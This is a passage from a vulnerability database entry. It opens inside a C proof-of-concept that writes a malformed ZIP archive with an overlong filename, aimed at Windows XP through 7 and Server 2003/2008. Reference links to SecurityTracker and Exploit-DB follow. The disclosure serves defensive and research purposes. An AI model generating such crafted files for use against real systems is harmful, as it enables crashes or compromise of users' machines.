"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x2e\x74\x78\x74\x50\x4b\x05\x06\x00\x00\x00\x00" \ "\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00\x00\x00" void error_handle(void); int main(){ printf("%s",POCNAME); FILE*file =fopen(FILENAME,"wb"); if(!file) error_handle(); fwrite(ZFILE,CHAR_SIZE,sizeof(ZFILE),file); fclose(file); return 0; } void error_handle(void){ perror("\nError"); exit(1); }

Products Mentioned

Configuraton 0

Microsoft>>Windows_7 >> Version *

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_vista >> Version -

Microsoft>>Windows_vista >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version sp3

References

http://www.securitytracker.com/id?1024557
Tags : vdb-entry, x_refsource_SECTRACK
http://www.exploit-db.com/exploits/13921/
Tags : exploit, x_refsource_EXPLOIT-DB
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.